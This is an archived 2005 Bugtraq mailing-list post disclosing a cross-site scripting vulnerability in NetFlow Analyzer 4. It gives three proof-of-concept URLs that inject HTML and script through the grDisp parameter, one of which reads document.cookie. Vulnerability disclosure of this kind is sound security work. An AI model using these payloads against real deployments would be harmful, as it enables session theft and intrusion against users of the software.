NetFlow Analyzer 4 XSS Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: NetFlow Analyzer 4 XSS Vulnerability
From: why@xxxxxxxxxxx
Date: 18 Oct 2005 03:37:24 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

NetFlow Analyzer 4
http://manageengine.adventnet.com/products/netflow/

I encountered Cross Site Scripting Vulnerabilities in some files of the NetFlow 
Analyzer 4, with this files, sending a specially crafted url you can execute 
commands in the client side.

____Proof of Concept______

http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<h1>test</h1>
http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<script>alert("test")</script>
http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<script>alert(document.cookie)</script>


Why, why@xxxxxxxxxxx

Prev by Date: Re: [Full-disclosure] Ciscos VPN-Client-Passwords can be decrypted
Next by Date: e107 remote commands execution
Previous by thread: MDKSA-2005:186 - Updated lynx packages fix remote buffer overflow
Next by thread: e107 remote commands execution
Index(es):
- Date
- Thread